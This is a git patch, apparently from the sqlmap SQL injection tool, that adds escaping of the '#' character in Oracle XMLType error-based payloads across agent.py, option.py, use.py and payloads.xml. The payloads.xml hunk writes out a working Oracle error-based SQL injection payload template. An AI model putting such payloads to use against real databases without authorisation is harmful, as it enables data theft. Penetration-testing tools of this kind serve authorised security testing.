From ac5a752b1261113969f7ddce3255dc27190f871c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 1 Mar 2012 11:59:37 +0000 Subject: [PATCH] Oracle's XMLType doesn't like '#' char too --- lib/core/agent.py | 3 ++- lib/core/option.py | 5 ++--- lib/techniques/error/use.py | 2 +- xml/payloads.xml | 2 +- 4 files changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/core/agent.py b/lib/core/agent.py index 07261b5fc..f45b8c500 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -217,7 +217,8 @@ class Agent: _ = ( ("[RANDNUM]", str(randInt)), ("[RANDNUM1]", str(randInt1)), ("[RANDSTR]", randStr),\ ("[RANDSTR1]", randStr1), ("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\ - ("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar) + ("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar),\ + ("[HASH_REPLACE]", kb.chars.hash_) ) payload = reduce(lambda x, y: x.replace(y[0], y[1]), _, payload) diff --git a/lib/core/option.py b/lib/core/option.py index 7c5f3e570..91ba1ed80 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1502,9 +1502,8 @@ def __setKnowledgeBaseAttributes(flushAll=True): kb.chars.delimiter = randomStr(length=6, lowercase=True) kb.chars.start = ":%s:" % randomStr(length=3, lowercase=True) kb.chars.stop = ":%s:" % randomStr(length=3, lowercase=True) - kb.chars.at = ":%s:" % randomStr(length=1, lowercase=True) - kb.chars.space = ":%s:" % randomStr(length=1, lowercase=True) - kb.chars.dollar = ":%s:" % randomStr(length=1, lowercase=True) + + kb.chars.at, kb.chars.space, kb.chars.dollar, kb.chars.hash_ = (":%s:" % _ for _ in randomStr(length=4, lowercase=True)) if flushAll: kb.headerPaths = {} diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py index f4f923091..ab394b2ec 100644 --- a/lib/techniques/error/use.py +++ b/lib/techniques/error/use.py @@ -180,7 +180,7 @@ def __errorReplaceChars(value): retVal = value if value: - retVal = retVal.replace(kb.chars.space, " ").replace(kb.chars.dollar, "$").replace(kb.chars.at, "@") + retVal = retVal.replace(kb.chars.space, " ").replace(kb.chars.dollar, "$").replace(kb.chars.at, "@").replace(kb.chars.hash_, "#") return retVal diff --git a/xml/payloads.xml b/xml/payloads.xml index 99d65321e..b51ff2373 100644 --- a/xml/payloads.xml +++ b/xml/payloads.xml @@ -1242,7 +1242,7 @@ Formats: 0 1 1 - AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)